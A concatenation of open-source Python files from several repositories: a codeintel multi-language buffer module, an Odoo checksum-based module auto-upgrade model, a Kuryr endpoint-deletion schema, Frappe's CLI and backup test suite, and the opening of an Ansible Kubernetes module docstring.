return None
lang = self.lang_from_pos(curr_pos-1)
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return (-1, -1)
try:
return langintel.curr_calltip_arg_range(self, trg_pos, calltip,
curr_pos)
except AttributeError:
# This can happen if we accidentally move into a non-programming
# language during a calltip. E.g. bug 69529. Cancel the calltip
# in this case.
return (-1, -1)
def async_eval_at_trg(self, trg, ctlr):
try:
langintel = self.mgr.langintel_from_lang(trg.lang)
except KeyError:
return None
return langintel.async_eval_at_trg(self, trg, ctlr)
# Override Citadel.defn_trg_from_pos()
def defn_trg_from_pos(self, pos, lang=None):
# Work out the language from the position, as the citadel buffer will
# use the buffer language, we want a language specific to this pos.
return CitadelBuffer.defn_trg_from_pos(self, pos,
lang=self.lang_from_pos(pos))
def libs(self):
"""A simple `.libs' property does not work for multi-lang buffers.
Use `.libs_from_lang(lang)' instead.
"""
raise RuntimeError("`.libs' invalid for multi-lang buffers: use "
"`mgr.langintel_from_lang(lang).libs_from_buf(buf)' "
"directly")
def style_names_from_style_num(self, style_num):
# XXX Would like to have python-foo instead of p_foo or SCE_P_FOO, but
# that requires a more comprehensive solution for all langs and
# multi-langs.
style_names = []
# Get the constant name from ScintillaConstants.
if "UDL" not in self._style_name_from_style_num_from_lang:
name_from_num \
= self._style_name_from_style_num_from_lang["UDL"] = {}
if self.sce_prefixes is None:
raise CodeIntelError("'sce_prefixes' not set on class %s: cannot "
"determine style constant names"
% self.__class__.__name__)
for attr in dir(ScintillaConstants):
for sce_prefix in self.sce_prefixes:
if attr.startswith(sce_prefix):
name_from_num[getattr(ScintillaConstants, attr)] = attr
else:
name_from_num \
= self._style_name_from_style_num_from_lang["UDL"]
const_name = name_from_num[style_num]
style_names.append(const_name)
# Get a style group from styles.py.
if "UDL" in styles.StateMap:
for style_group, const_names in list(styles.StateMap["UDL"].items()):
if const_name in const_names:
style_names.append(style_group)
break
else:
log.warn("lang '%s' not in styles.StateMap: won't have "
"common style groups in HTML output" % "UDL")
return style_names
__string_styles = None
def string_styles(self):
if self.__string_styles is None:
state_map = styles.StateMap["UDL"]
self.__string_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("strings", "stringeol")
for style_name in state_map.get(style_class, [])
]
return self.__string_styles
__comment_styles = None
def comment_styles(self):
if self.__comment_styles is None:
state_map = styles.StateMap["UDL"]
self.__comment_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("comments", "here documents",
"data sections")
for style_name in state_map.get(style_class, [])
]
return self.__comment_styles
__number_styles = None
def number_styles(self):
if self.__number_styles is None:
state_map = styles.StateMap["UDL"]
self.__number_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("numbers",)
for style_name in state_map.get(style_class, [])
]
return self.__number_styles
class XMLParsingBufferMixin(object):
"""A mixin for UDLBuffer-based buffers of XML-y/HTML-y languages to
support the following:
- An "xml_tree" attribute that is a XML parse tree of the document
(lazily done from koXMLTreeService)
- An "xml_parse()" method to force a re-parse of the document.
TODO: locking?
"""
_xml_tree_cache = None
_xml_default_dataset_info = None
@property
def xml_tree(self):
if self._xml_tree_cache is None:
self.xml_parse()
return self._xml_tree_cache
def xml_parse(self):
from koXMLTreeService import getService
path = self.path
if isUnsavedPath(self.path):
# The "<Unsaved>/..." special path can *crash* Python if trying to
# open it. Besides, the "<Unsaved>" business is an internal
# codeintel detail.
path = None
self._xml_tree_cache = getService().getTreeForURI(
path, self.accessor.text)
def xml_default_dataset_info(self, node=None):
if self._xml_default_dataset_info is None:
import koXMLDatasetInfo
datasetSvc = koXMLDatasetInfo.getService()
self._xml_default_dataset_info = (
datasetSvc.getDefaultPublicId(self.m_lang, self.env),
None,
datasetSvc.getDefaultNamespace(self.m_lang, self.env))
return self._xml_default_dataset_info
def xml_tree_handler(self, node=None):
import koXMLDatasetInfo
return koXMLDatasetInfo.get_tree_handler(self._xml_tree_cache, node, self.xml_default_dataset_info(node))
def xml_node_at_pos(self, pos):
import koXMLTreeService
self.xml_parse()
tree = self._xml_tree_cache
if not tree:
return None
line, col = self.accessor.line_and_col_at_pos(pos)
node = tree.locateNode(line, col)
# XXX this needs to be worked out better
last_start = self.accessor.text.rfind('<', 0, pos)
last_end = self.accessor.text.find('>', last_start, pos)
if node is None and last_start >= 0:
node = koXMLTreeService.elementFromText(
tree, self.accessor.text[last_start:last_end], node)
if node is None or node.start is None:
return node
# elementtree line numbers are 1 based, convert to zero based
node_pos = self.accessor.pos_from_line_and_col(
node.start[0]-1, node.start[1])
if last_end == -1 and last_start != node_pos:
# print "try parse ls %d le %d np %d pos %d %r" % (last_start, last_end, node_pos, pos, accessor.text[last_start:pos])
# we have a dirty tree, need to create a current node and add it
newnode = koXMLTreeService.elementFromText(
tree, self.accessor.text[last_start:pos], node)
if newnode is not None:
return newnode
return node
class _NotYetSet(object):
# Used below to distinguish from None.
pass
class UDLCILEDriver(CILEDriver):
ssl_lang = None # Sub-classes must set one or both of these for
csl_lang = None # citadel-scanning support.
_master_cile_driver = None
slave_csl_cile_driver = _NotYetSet # to distinguish from None
@property
def master_cile_driver(self):
"""The primary CILE driver for this multi-lang lang.
This is the CILE driver for the SSL lang, if there is one, otherwise
for the csl_lang.
Side effect: `self.slave_csl_cile_driver' is determined the
first time this is called. A little gross, I know, but it
avoids having a separate property.
"""
if self._master_cile_driver is None:
if self.ssl_lang is not None:
self._master_cile_driver \
= self.mgr.citadel.cile_driver_from_lang(self.ssl_lang)
self.slave_csl_cile_driver \
= self.mgr.citadel.cile_driver_from_lang(self.csl_lang)
else:
self._master_cile_driver \
= self.mgr.citadel.cile_driver_from_lang(self.csl_lang)
self.slave_csl_cile_driver = None
return self._master_cile_driver
def scan_purelang(self, buf):
log.info("scan_purelang: path: %r lang: %s", buf.path, buf.lang)
return self.master_cile_driver.scan_multilang(
buf, self.slave_csl_cile_driver)
| anisku11/sublimeku | Packages/CodeComplice/libs/codeintel2/udl.py | Python | mit | 23,772 | 0.000463 |
# -*- coding: utf-8 -*-
# Copyright 2017 LasLabs Inc.
# Copyright 2018 ACSONE SA/NV.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import json
import logging
import os
from openerp import api, exceptions, models, tools
from openerp.modules.module import get_module_path
from ..addon_hash import addon_hash
PARAM_INSTALLED_CHECKSUMS = \
'module_auto_update.installed_checksums'
PARAM_EXCLUDE_PATTERNS = \
'module_auto_update.exclude_patterns'
DEFAULT_EXCLUDE_PATTERNS = \
'*.pyc,*.pyo,i18n/*.pot,i18n_extra/*.pot,static/*'
_logger = logging.getLogger(__name__)
class FailedUpgradeError(exceptions.Warning):
pass
class IncompleteUpgradeError(exceptions.Warning):
pass
def ensure_module_state(env, modules, state):
# read module states, bypassing any Odoo cache
if not modules:
return
env.cr.execute(
"SELECT name FROM ir_module_module "
"WHERE id IN %s AND state != %s",
(tuple(modules.ids), state),
)
names = [r[0] for r in env.cr.fetchall()]
if names:
raise FailedUpgradeError(
"The following modules should be in state '%s' "
"at this stage: %s. Bailing out for safety." %
(state, ','.join(names), ),
)
class Module(models.Model):
_inherit = 'ir.module.module'
@api.multi
def _get_checksum_dir(self):
self.ensure_one()
exclude_patterns = self.env["ir.config_parameter"].get_param(
PARAM_EXCLUDE_PATTERNS,
DEFAULT_EXCLUDE_PATTERNS,
)
exclude_patterns = [p.strip() for p in exclude_patterns.split(',')]
keep_langs = self.env['res.lang'].search([]).mapped('code')
module_path = get_module_path(self.name)
if module_path and os.path.isdir(module_path):
checksum_dir = addon_hash(
module_path,
exclude_patterns,
keep_langs,
)
else:
checksum_dir = False
return checksum_dir
@api.model
def _get_saved_checksums(self):
Icp = self.env['ir.config_parameter']
return json.loads(Icp.get_param(PARAM_INSTALLED_CHECKSUMS, '{}'))
@api.model
def _save_checksums(self, checksums):
Icp = self.env['ir.config_parameter']
Icp.set_param(PARAM_INSTALLED_CHECKSUMS, json.dumps(checksums))
@api.model
def _save_installed_checksums(self):
checksums = {}
installed_modules = self.search([('state', '=', 'installed')])
for module in installed_modules:
checksums[module.name] = module._get_checksum_dir()
self._save_checksums(checksums)
@api.model
def _get_modules_partially_installed(self):
return self.search([
('state', 'in', ('to install', 'to remove', 'to upgrade')),
])
@api.model
def _get_modules_with_changed_checksum(self):
saved_checksums = self._get_saved_checksums()
installed_modules = self.search([('state', '=', 'installed')])
return installed_modules.filtered(
lambda r: r._get_checksum_dir() != saved_checksums.get(r.name),
)
@api.model
def upgrade_changed_checksum(self, overwrite_existing_translations=False):
"""Run an upgrade of the database, upgrading only changed modules.
Installed modules for which the checksum has changed since the
last successful run of this method are marked "to upgrade",
then the normal Odoo scheduled upgrade process
is launched.
If there is no module with a changed checksum, and no module in state
other than installed, uninstalled, uninstallable, this method does
nothing, otherwise the normal Odoo upgrade process is launched.
After a successful upgrade, the checksums of installed modules are
saved.
In case of error during the upgrade, an exception is raised.
If any module remains to upgrade or to uninstall after the upgrade
process, an exception is raised as well.
Note: this method commits the current transaction at each important
step, it is therefore not intended to be run as part of a
larger transaction.
"""
_logger.info(
"Checksum upgrade starting (i18n-overwrite=%s)...",
overwrite_existing_translations
)
tools.config['overwrite_existing_translations'] = \
overwrite_existing_translations
_logger.info("Updating modules list...")
self.update_list()
changed_modules = self._get_modules_with_changed_checksum()
if not changed_modules and not self._get_modules_partially_installed():
_logger.info("No checksum change detected in installed modules "
"and all modules installed, nothing to do.")
return
_logger.info("Marking the following modules to upgrade, "
"for their checksums changed: %s...",
','.join(changed_modules.mapped('name')))
changed_modules.button_upgrade()
self.env.cr.commit() # pylint: disable=invalid-commit
# in rare situations, button_upgrade may fail without
# exception, this would lead to corruption because
# no upgrade would be performed and save_installed_checksums
# would update cheksums for modules that have not been upgraded
ensure_module_state(self.env, changed_modules, 'to upgrade')
_logger.info("Upgrading...")
self.env['base.module.upgrade'].upgrade_module()
self.env.cr.commit() # pylint: disable=invalid-commit
_logger.info("Upgrade successful, updating checksums...")
self._save_installed_checksums()
self.env.cr.commit() # pylint: disable=invalid-commit
partial_modules = self._get_modules_partially_installed()
if partial_modules:
raise IncompleteUpgradeError(
"Checksum upgrade successful "
"but incomplete for the following modules: %s" %
','.join(partial_modules.mapped('name'))
)
_logger.info("Checksum upgrade complete.")
| ddico/server-tools | module_auto_update/models/module.py | Python | agpl-3.0 | 6,204 | 0 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from kuryr.schemata import commons
ENDPOINT_DELETE_SCHEMA = {
u'links': [{
u'method': u'POST',
u'href': u'/NetworkDriver.DeleteEndpoint',
u'description': u'Delete an Endpoint',
u'rel': u'self',
u'title': u'Delete'
}],
u'title': u'Delete endpoint',
u'required': [u'NetworkID', u'EndpointID'],
u'definitions': {u'commons': {}},
u'$schema': u'http://json-schema.org/draft-04/hyper-schema',
u'type': u'object',
u'properties': {
u'NetworkID': {
u'description': u'Network ID',
u'$ref': u'#/definitions/commons/definitions/id'
},
u'EndpointID': {
u'description': u'Endpoint ID',
u'$ref': u'#/definitions/commons/definitions/id'
}
}
}
ENDPOINT_DELETE_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS
| midonet/kuryr | kuryr/schemata/endpoint_delete.py | Python | apache-2.0 | 1,400 | 0 |
# Copyright (c) 2022, Frappe Technologies Pvt. Ltd. and Contributors
# License: MIT. See LICENSE
# imports - standard imports
import gzip
import importlib
import json
import os
import shlex
import shutil
import subprocess
import unittest
from contextlib import contextmanager
from functools import wraps
from glob import glob
from typing import List, Optional
from unittest.case import skipIf
from unittest.mock import patch
# imports - third party imports
import click
from click.testing import CliRunner, Result
from click import Command
# imports - module imports
import frappe
import frappe.commands.site
import frappe.commands.utils
import frappe.recorder
from frappe.installer import add_to_installed_apps, remove_app
from frappe.utils import add_to_date, get_bench_path, get_bench_relative_path, now
from frappe.utils.backups import fetch_latest_backups
_result: Optional[Result] = None
TEST_SITE = "commands-site-O4PN2QKA.test" # added random string tag to avoid collisions
CLI_CONTEXT = frappe._dict(sites=[TEST_SITE])
def clean(value) -> str:
"""Strips and converts bytes to str
Args:
value ([type]): [description]
Returns:
[type]: [description]
"""
if isinstance(value, bytes):
value = value.decode()
if isinstance(value, str):
value = value.strip()
return value
def missing_in_backup(doctypes: List, file: os.PathLike) -> List:
"""Returns list of missing doctypes in the backup.
Args:
doctypes (list): List of DocTypes to be checked
file (str): Path of the database file
Returns:
doctypes(list): doctypes that are missing in backup
"""
predicate = (
'COPY public."tab{}"'
if frappe.conf.db_type == "postgres"
else "CREATE TABLE `tab{}`"
)
with gzip.open(file, "rb") as f:
content = f.read().decode("utf8").lower()
return [doctype for doctype in doctypes
if predicate.format(doctype).lower() not in content]
def exists_in_backup(doctypes: List, file: os.PathLike) -> bool:
"""Checks if the list of doctypes exist in the database.sql.gz file supplied
Args:
doctypes (list): List of DocTypes to be checked
file (str): Path of the database file
Returns:
bool: True if all tables exist
"""
missing_doctypes = missing_in_backup(doctypes, file)
return len(missing_doctypes) == 0
@contextmanager
def maintain_locals():
pre_site = frappe.local.site
pre_flags = frappe.local.flags.copy()
pre_db = frappe.local.db
try:
yield
finally:
post_site = getattr(frappe.local, "site", None)
if not post_site or post_site != pre_site:
frappe.init(site=pre_site)
frappe.local.db = pre_db
frappe.local.flags.update(pre_flags)
def pass_test_context(f):
@wraps(f)
def decorated_function(*args, **kwargs):
return f(CLI_CONTEXT, *args, **kwargs)
return decorated_function
@contextmanager
def cli(cmd: Command, args: Optional[List] = None):
with maintain_locals():
global _result
patch_ctx = patch("frappe.commands.pass_context", pass_test_context)
_module = cmd.callback.__module__
_cmd = cmd.callback.__qualname__
__module = importlib.import_module(_module)
patch_ctx.start()
importlib.reload(__module)
click_cmd = getattr(__module, _cmd)
try:
_result = CliRunner().invoke(click_cmd, args=args)
_result.command = str(cmd)
yield _result
finally:
patch_ctx.stop()
__module = importlib.import_module(_module)
importlib.reload(__module)
importlib.invalidate_caches()
class BaseTestCommands(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.setup_test_site()
return super().setUpClass()
@classmethod
def execute(self, command, kwargs=None):
site = {"site": frappe.local.site}
cmd_input = None
if kwargs:
cmd_input = kwargs.get("cmd_input", None)
if cmd_input:
if not isinstance(cmd_input, bytes):
raise Exception(
f"The input should be of type bytes, not {type(cmd_input).__name__}"
)
del kwargs["cmd_input"]
kwargs.update(site)
else:
kwargs = site
self.command = " ".join(command.split()).format(**kwargs)
click.secho(self.command, fg="bright_black")
command = shlex.split(self.command)
self._proc = subprocess.run(command, input=cmd_input, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.stdout = clean(self._proc.stdout)
self.stderr = clean(self._proc.stderr)
self.returncode = clean(self._proc.returncode)
@classmethod
def setup_test_site(cls):
cmd_config = {
"test_site": TEST_SITE,
"admin_password": frappe.conf.admin_password,
"root_login": frappe.conf.root_login,
"root_password": frappe.conf.root_password,
"db_type": frappe.conf.db_type,
}
if not os.path.exists(
os.path.join(TEST_SITE, "site_config.json")
):
cls.execute(
"bench new-site {test_site} --admin-password {admin_password} --db-type"
" {db_type}",
cmd_config,
)
def _formatMessage(self, msg, standardMsg):
output = super(BaseTestCommands, self)._formatMessage(msg, standardMsg)
if not hasattr(self, "command") and _result:
command = _result.command
stdout = _result.stdout_bytes.decode() if _result.stdout_bytes else None
stderr = _result.stderr_bytes.decode() if _result.stderr_bytes else None
returncode = _result.exit_code
else:
command = self.command
stdout = self.stdout
stderr = self.stderr
returncode = self.returncode
cmd_execution_summary = "\n".join([
"-" * 70,
"Last Command Execution Summary:",
"Command: {}".format(command) if command else "",
"Standard Output: {}".format(stdout) if stdout else "",
"Standard Error: {}".format(stderr) if stderr else "",
"Return Code: {}".format(returncode) if returncode else "",
]).strip()
return "{}\n\n{}".format(output, cmd_execution_summary)
class TestCommands(BaseTestCommands):
def test_execute(self):
# test 1: execute a command expecting a numeric output
self.execute("bench --site {site} execute frappe.db.get_database_size")
self.assertEqual(self.returncode, 0)
self.assertIsInstance(float(self.stdout), float)
# test 2: execute a command expecting an errored output as local won't exist
self.execute("bench --site {site} execute frappe.local.site")
self.assertEqual(self.returncode, 1)
self.assertIsNotNone(self.stderr)
# test 3: execute a command with kwargs
# Note:
# terminal command has been escaped to avoid .format string replacement
# The returned value has quotes which have been trimmed for the test
self.execute("""bench --site {site} execute frappe.bold --kwargs '{{"text": "DocType"}}'""")
self.assertEqual(self.returncode, 0)
self.assertEqual(self.stdout[1:-1], frappe.bold(text="DocType"))
@unittest.skip
def test_restore(self):
# step 0: create a site to run the test on
global_config = {
"admin_password": frappe.conf.admin_password,
"root_login": frappe.conf.root_login,
"root_password": frappe.conf.root_password,
"db_type": frappe.conf.db_type,
}
site_data = {"test_site": TEST_SITE, **global_config}
for key, value in global_config.items():
if value:
self.execute(f"bench set-config {key} {value} -g")
# test 1: bench restore from full backup
self.execute("bench --site {test_site} backup --ignore-backup-conf", site_data)
self.execute(
"bench --site {test_site} execute frappe.utils.backups.fetch_latest_backups",
site_data,
)
site_data.update({"database": json.loads(self.stdout)["database"]})
self.execute("bench --site {test_site} restore {database}", site_data)
# test 2: restore from partial backup
self.execute("bench --site {test_site} backup --exclude 'ToDo'", site_data)
site_data.update({"kw": "\"{'partial':True}\""})
self.execute(
"bench --site {test_site} execute"
" frappe.utils.backups.fetch_latest_backups --kwargs {kw}",
site_data,
)
site_data.update({"database": json.loads(self.stdout)["database"]})
self.execute("bench --site {test_site} restore {database}", site_data)
self.assertEqual(self.returncode, 1)
def test_partial_restore(self):
_now = now()
for num in range(10):
frappe.get_doc({
"doctype": "ToDo",
"date": add_to_date(_now, days=num),
"description": frappe.mock("paragraph")
}).insert()
frappe.db.commit()
todo_count = frappe.db.count("ToDo")
# check if todos exist, create a partial backup and see if the state is the same after restore
self.assertIsNot(todo_count, 0)
self.execute("bench --site {site} backup --only 'ToDo'")
db_path = fetch_latest_backups(partial=True)["database"]
self.assertTrue("partial" in db_path)
frappe.db.sql_ddl("DROP TABLE IF EXISTS `tabToDo`")
frappe.db.commit()
self.execute("bench --site {site} partial-restore {path}", {"path": db_path})
self.assertEqual(self.returncode, 0)
self.assertEqual(frappe.db.count("ToDo"), todo_count)
def test_recorder(self):
frappe.recorder.stop()
self.execute("bench --site {site} start-recording")
frappe.local.cache = {}
self.assertEqual(frappe.recorder.status(), True)
self.execute("bench --site {site} stop-recording")
frappe.local.cache = {}
self.assertEqual(frappe.recorder.status(), False)
def test_remove_from_installed_apps(self):
app = "test_remove_app"
add_to_installed_apps(app)
# check: confirm that add_to_installed_apps added the app in the default
self.execute("bench --site {site} list-apps")
self.assertIn(app, self.stdout)
# test 1: remove app from installed_apps global default
self.execute("bench --site {site} remove-from-installed-apps {app}", {"app": app})
self.assertEqual(self.returncode, 0)
self.execute("bench --site {site} list-apps")
self.assertNotIn(app, self.stdout)
def test_list_apps(self):
# test 1: sanity check for command
self.execute("bench --site all list-apps")
self.assertIsNotNone(self.returncode)
self.assertIsInstance(self.stdout or self.stderr, str)
# test 2: bare functionality for single site
self.execute("bench --site {site} list-apps")
self.assertEqual(self.returncode, 0)
list_apps = set(
_x.split()[0] for _x in self.stdout.split("\n")
)
doctype = frappe.get_single("Installed Applications").installed_applications
if doctype:
installed_apps = set(x.app_name for x in doctype)
else:
installed_apps = set(frappe.get_installed_apps())
self.assertSetEqual(list_apps, installed_apps)
# test 3: parse json format
self.execute("bench --site {site} list-apps --format json")
self.assertEqual(self.returncode, 0)
self.assertIsInstance(json.loads(self.stdout), dict)
self.execute("bench --site {site} list-apps -f json")
self.assertEqual(self.returncode, 0)
self.assertIsInstance(json.loads(self.stdout), dict)
def test_show_config(self):
# test 1: sanity check for command
self.execute("bench --site all show-config")
self.assertEqual(self.returncode, 0)
# test 2: test keys in table text
self.execute(
"bench --site {site} set-config test_key '{second_order}' --parse",
{"second_order": json.dumps({"test_key": "test_value"})},
)
self.execute("bench --site {site} show-config")
self.assertEqual(self.returncode, 0)
self.assertIn("test_key.test_key", self.stdout.split())
self.assertIn("test_value", self.stdout.split())
# test 3: parse json format
self.execute("bench --site all show-config --format json")
self.assertEqual(self.returncode, 0)
self.assertIsInstance(json.loads(self.stdout), dict)
self.execute("bench --site {site} show-config --format json")
self.assertIsInstance(json.loads(self.stdout), dict)
self.execute("bench --site {site} show-config -f json")
self.assertIsInstance(json.loads(self.stdout), dict)
def test_get_bench_relative_path(self):
bench_path = get_bench_path()
test1_path = os.path.join(bench_path, "test1.txt")
test2_path = os.path.join(bench_path, "sites", "test2.txt")
with open(test1_path, "w+") as test1:
test1.write("asdf")
with open(test2_path, "w+") as test2:
test2.write("asdf")
self.assertTrue("test1.txt" in get_bench_relative_path("test1.txt"))
self.assertTrue("sites/test2.txt" in get_bench_relative_path("test2.txt"))
with self.assertRaises(SystemExit):
get_bench_relative_path("test3.txt")
os.remove(test1_path)
os.remove(test2_path)
def test_frappe_site_env(self):
os.putenv('FRAPPE_SITE', frappe.local.site)
self.execute("bench execute frappe.ping")
self.assertEqual(self.returncode, 0)
self.assertIn("pong", self.stdout)
def test_version(self):
self.execute("bench version")
self.assertEqual(self.returncode, 0)
for output in ["legacy", "plain", "table", "json"]:
self.execute(f"bench version -f {output}")
self.assertEqual(self.returncode, 0)
self.execute("bench version -f invalid")
self.assertEqual(self.returncode, 2)
def test_set_password(self):
from frappe.utils.password import check_password
self.execute("bench --site {site} set-password Administrator test1")
self.assertEqual(self.returncode, 0)
self.assertEqual(check_password('Administrator', 'test1'), 'Administrator')
# to release the lock taken by check_password
frappe.db.commit()
self.execute("bench --site {site} set-admin-password test2")
self.assertEqual(self.returncode, 0)
self.assertEqual(check_password('Administrator', 'test2'), 'Administrator')
def test_make_app(self):
user_input = [
b"Test App", # title
b"This app's description contains 'single quotes' and \"double quotes\".", # description
b"Test Publisher", # publisher
b"example@example.org", # email
b"", # icon
b"", # color
b"MIT" # app_license
]
app_name = "testapp0"
apps_path = os.path.join(get_bench_path(), "apps")
test_app_path = os.path.join(apps_path, app_name)
self.execute(f"bench make-app {apps_path} {app_name}", {"cmd_input": b'\n'.join(user_input)})
self.assertEqual(self.returncode, 0)
self.assertTrue(
os.path.exists(test_app_path)
)
# cleanup
shutil.rmtree(test_app_path)
@skipIf(
not (
frappe.conf.root_password
and frappe.conf.admin_password
and frappe.conf.db_type == "mariadb"
),
"DB Root password and Admin password not set in config"
)
def test_bench_drop_site_should_archive_site(self):
# TODO: Make this test postgres compatible
site = TEST_SITE
self.execute(
f"bench new-site {site} --force --verbose "
f"--admin-password {frappe.conf.admin_password} "
f"--mariadb-root-password {frappe.conf.root_password} "
f"--db-type {frappe.conf.db_type or 'mariadb'} "
)
self.assertEqual(self.returncode, 0)
self.execute(f"bench drop-site {site} --force --root-password {frappe.conf.root_password}")
self.assertEqual(self.returncode, 0)
bench_path = get_bench_path()
site_directory = os.path.join(bench_path, f'sites/{site}')
self.assertFalse(os.path.exists(site_directory))
archive_directory = os.path.join(bench_path, f'archived/sites/{site}')
self.assertTrue(os.path.exists(archive_directory))
class TestBackups(BaseTestCommands):
backup_map = {
"includes": {
"includes": [
"ToDo",
"Note",
]
},
"excludes": {
"excludes": [
"Activity Log",
"Access Log",
"Error Log"
]
}
}
home = os.path.expanduser("~")
site_backup_path = frappe.utils.get_site_path("private", "backups")
def setUp(self):
self.files_to_trash = []
def tearDown(self):
if self._testMethodName == "test_backup":
for file in self.files_to_trash:
os.remove(file)
try:
os.rmdir(os.path.dirname(file))
except OSError:
pass
def test_backup_no_options(self):
"""Take a backup without any options
"""
before_backup = fetch_latest_backups(partial=True)
self.execute("bench --site {site} backup")
after_backup = fetch_latest_backups(partial=True)
self.assertEqual(self.returncode, 0)
self.assertIn("successfully completed", self.stdout)
self.assertNotEqual(before_backup["database"], after_backup["database"])
def test_backup_with_files(self):
"""Take a backup with files (--with-files)
"""
before_backup = fetch_latest_backups()
self.execute("bench --site {site} backup --with-files")
after_backup = fetch_latest_backups()
self.assertEqual(self.returncode, 0)
self.assertIn("successfully completed", self.stdout)
self.assertIn("with files", self.stdout)
self.assertNotEqual(before_backup, after_backup)
self.assertIsNotNone(after_backup["public"])
self.assertIsNotNone(after_backup["private"])
def test_backup_with_custom_path(self):
"""Backup to a custom path (--backup-path)
"""
backup_path = os.path.join(self.home, "backups")
self.execute("bench --site {site} backup --backup-path {backup_path}", {"backup_path": backup_path})
self.assertEqual(self.returncode, 0)
self.assertTrue(os.path.exists(backup_path))
self.assertGreaterEqual(len(os.listdir(backup_path)), 2)
def test_backup_with_different_file_paths(self):
"""Backup with different file paths (--backup-path-db, --backup-path-files, --backup-path-private-files, --backup-path-conf)
"""
kwargs = {
key: os.path.join(self.home, key, value)
for key, value in {
"db_path": "database.sql.gz",
"files_path": "public.tar",
"private_path": "private.tar",
"conf_path": "config.json",
}.items()
}
self.execute(
"""bench
--site {site} backup --with-files
--backup-path-db {db_path}
--backup-path-files {files_path}
--backup-path-private-files {private_path}
--backup-path-conf {conf_path}""",
kwargs,
)
self.assertEqual(self.returncode, 0)
for path in kwargs.values():
self.assertTrue(os.path.exists(path))
def test_backup_compress_files(self):
"""Take a compressed backup (--compress)
"""
self.execute("bench --site {site} backup --with-files --compress")
self.assertEqual(self.returncode, 0)
compressed_files = glob(f"{self.site_backup_path}/*.tgz")
self.assertGreater(len(compressed_files), 0)
def test_backup_verbose(self):
"""Take a verbose backup (--verbose)
"""
self.execute("bench --site {site} backup --verbose")
self.assertEqual(self.returncode, 0)
def test_backup_only_specific_doctypes(self):
"""Take a backup with (include) backup options set in the site config `frappe.conf.backup.includes`
"""
self.execute(
"bench --site {site} set-config backup '{includes}' --parse",
{"includes": json.dumps(self.backup_map["includes"])},
)
self.execute("bench --site {site} backup --verbose")
self.assertEqual(self.returncode, 0)
database = fetch_latest_backups(partial=True)["database"]
self.assertEqual([], missing_in_backup(self.backup_map["includes"]["includes"], database))
def test_backup_excluding_specific_doctypes(self):
"""Take a backup with (exclude) backup options set (`frappe.conf.backup.excludes`, `--exclude`)
"""
# test 1: take a backup with frappe.conf.backup.excludes
self.execute(
"bench --site {site} set-config backup '{excludes}' --parse",
{"excludes": json.dumps(self.backup_map["excludes"])},
)
self.execute("bench --site {site} backup --verbose")
self.assertEqual(self.returncode, 0)
database = fetch_latest_backups(partial=True)["database"]
self.assertFalse(exists_in_backup(self.backup_map["excludes"]["excludes"], database))
self.assertEqual([], missing_in_backup(self.backup_map["includes"]["includes"], database))
# test 2: take a backup with --exclude
self.execute(
"bench --site {site} backup --exclude '{exclude}'",
{"exclude": ",".join(self.backup_map["excludes"]["excludes"])},
)
self.assertEqual(self.returncode, 0)
database = fetch_latest_backups(partial=True)["database"]
self.assertFalse(exists_in_backup(self.backup_map["excludes"]["excludes"], database))
def test_selective_backup_priority_resolution(self):
"""Take a backup with conflicting backup options set (`frappe.conf.excludes`, `--include`)
"""
self.execute(
"bench --site {site} backup --include '{include}'",
{"include": ",".join(self.backup_map["includes"]["includes"])},
)
self.assertEqual(self.returncode, 0)
database = fetch_latest_backups(partial=True)["database"]
self.assertEqual([], missing_in_backup(self.backup_map["includes"]["includes"], database))
def test_dont_backup_conf(self):
"""Take a backup ignoring frappe.conf.backup settings (with --ignore-backup-conf option)
"""
self.execute("bench --site {site} backup --ignore-backup-conf")
self.assertEqual(self.returncode, 0)
database = fetch_latest_backups()["database"]
self.assertEqual([], missing_in_backup(self.backup_map["excludes"]["excludes"], database))
class TestRemoveApp(unittest.TestCase):
def test_delete_modules(self):
from frappe.installer import (
_delete_doctypes,
_delete_modules,
_get_module_linked_doctype_field_map,
)
test_module = frappe.new_doc("Module Def")
test_module.update({"module_name": "RemoveThis", "app_name": "frappe"})
test_module.save()
module_def_linked_doctype = frappe.get_doc({
"doctype": "DocType",
"name": "Doctype linked with module def",
"module": "RemoveThis",
"custom": 1,
"fields": [{
"label": "Modulen't",
"fieldname": "notmodule",
"fieldtype": "Link",
"options": "Module Def"
}]
}).insert()
doctype_to_link_field_map = _get_module_linked_doctype_field_map()
self.assertIn("Report", doctype_to_link_field_map)
self.assertIn(module_def_linked_doctype.name, doctype_to_link_field_map)
self.assertEqual(doctype_to_link_field_map[module_def_linked_doctype.name], "notmodule")
self.assertNotIn("DocType", doctype_to_link_field_map)
doctypes_to_delete = _delete_modules([test_module.module_name], dry_run=False)
self.assertEqual(len(doctypes_to_delete), 1)
_delete_doctypes(doctypes_to_delete, dry_run=False)
self.assertFalse(frappe.db.exists("Module Def", test_module.module_name))
self.assertFalse(frappe.db.exists("DocType", module_def_linked_doctype.name))
def test_dry_run(self):
"""Check if dry run in not destructive."""
# nothing to assert, if this fails rest of the test suite will crumble.
remove_app("frappe", dry_run=True, yes=True, no_backup=True)
class TestSiteMigration(BaseTestCommands):
def test_migrate_cli(self):
with cli(frappe.commands.site.migrate) as result:
self.assertTrue(TEST_SITE in result.stdout)
self.assertEqual(result.exit_code, 0)
self.assertEqual(result.exception, None)
class TestBenchBuild(BaseTestCommands):
def test_build_assets(self):
with cli(frappe.commands.utils.build) as result:
self.assertEqual(result.exit_code, 0)
self.assertEqual(result.exception, None)
| frappe/frappe | frappe/tests/test_commands.py | Python | mit | 22,402 | 0.025266 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
DOCUMENTATION = """
---
module: kube
short_description: Manage Kubernetes Cluster
description:
- Create, replace, remove, and stop resources within a Kubernetes Cluster
version_added: "2.0"
options:
name:
required: false
default: null
description:
- The name associated with resource
filename:
required: false
default: null
